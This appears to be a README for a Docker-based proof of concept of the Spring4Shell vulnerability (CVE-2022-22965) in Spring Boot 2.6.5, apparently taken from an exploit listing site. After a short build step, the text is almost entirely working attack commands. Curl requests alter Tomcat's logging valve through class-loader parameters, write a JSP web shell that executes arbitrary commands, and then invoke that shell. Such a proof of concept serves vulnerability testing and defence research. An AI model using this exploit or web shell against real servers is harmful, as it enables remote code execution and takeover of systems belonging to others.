Share
## https://sploitus.com/exploit?id=AE9F0F3B-00DE-5B73-87A1-BA592FA6E616
# Spring Boot CVE-2022-22965
Docker PoC for CVE-2022-22965 with Spring Boot version 2.6.5

# Getting Started
1. Run `docker compose up --build` to build and start the vulnerable application.
2. Run `curl -H "Accept: text/html;" "http://localhost:8080/demo/sample?class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7b%63%6f%64%65%7d%69&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=shell&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat="` to changes Tomcat config valve.
3. Run `curl -H "Accept: text/html;" -H "code: <% java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter(String.valueOf(1337))).getInputStream(); int a = -1; byte[] b = new byte[2048]; while((a=in.read(b))!=-1) { out.println(new String(b)); } %>" "http://localhost:8080/demo/x"` to create the web shell.
4. Open your browser and go to http://localhost:8080/shell.jsp?1337=id to start executing commands.